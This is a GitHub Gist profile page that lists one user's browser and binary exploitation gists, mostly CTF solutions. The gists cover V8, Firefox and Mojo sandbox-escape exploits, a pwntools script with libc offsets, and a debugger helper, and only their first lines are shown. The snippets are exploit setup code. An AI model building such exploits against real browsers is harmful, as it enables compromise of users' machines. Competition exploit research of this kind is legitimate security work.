Skip to content

Instantly share code, notes, and snippets.

View hkraw's full-sized avatar

Harsh khuha hkraw

55 followers · 6 following
View GitHub Profile
@hkraw
hkraw / butterfly_expl.py
Last active February 12, 2024 22:59
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random
####Addr
leak_offset = 0x1b39e7
system = 0x4f4e0
@hkraw
hkraw / chrome-v8-issue-1126249.js
Last active April 20, 2022 15:29
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
@hkraw
hkraw / windbg_pwndbg_wrap.js
Last active April 20, 2022 15:29
add proper chain handling
//"use script";
const color_red = "";
const color_green = "";
const color_yellow = "";
const color_blue = "";
const color_mag = "";
const color_cyan = "";
const color_default = "";
@hkraw
hkraw / plaidCTF-the-false-promise.html
Created April 18, 2021 19:57
<html>
<head>
<script>
( async() => {
let gc = function() {
for(let i = 0; i < 100; i++) {
new ArrayBuffer(0x10000000);
}
}
@hkraw
hkraw / javascript-for-dummies-1.js
Created June 6, 2021 04:32
function pwn() {
/* Helpers */
var k_jsObjectSize = 0x70
var fclose_got = 0x45e58
var __libc_atoi = 0x18ea90
var __libc_environ = 0x1ef2e0
var __free_got = 0x4dde0
var __je_free = 0x13b10
@hkraw
hkraw / redpwn-empires.html
Created July 10, 2021 13:02
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
@hkraw
hkraw / 0ctf2020-fullchain++-cfi.html
Created July 14, 2021 11:03
<html>
<head>
<title>0ctf sbx</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>
@hkraw
hkraw / should've_had_a_v8_exploit.md
Last active April 20, 2022 15:23
UIUCTF-2021

Exploit (First blood)

let wasm_code = new Uint8Array([
  0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
  1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
  132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
  0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
  128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
  105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
  0,65,42,11
@hkraw
hkraw / index.html
Created January 2, 2022 21:34
GoogleCtf 2021 fullchain
<html>
<head>
<title>google-ctf fullchain</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo/mojo_bindings.js'></script>
<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
@hkraw
hkraw / corctf_outfoxed.md
Created August 23, 2021 06:28
first firefox pwn

outfoxed exp (First Blood)

let pwn = async function() {
  /* Helpers */
  let conversionBuffer = new ArrayBuffer(0x40)
  let floatView = new Float64Array(conversionBuffer)
  let intView = new BigUint64Array(conversionBuffer)

  BigInt.prototype.i2f = function() {
    intView[0] = this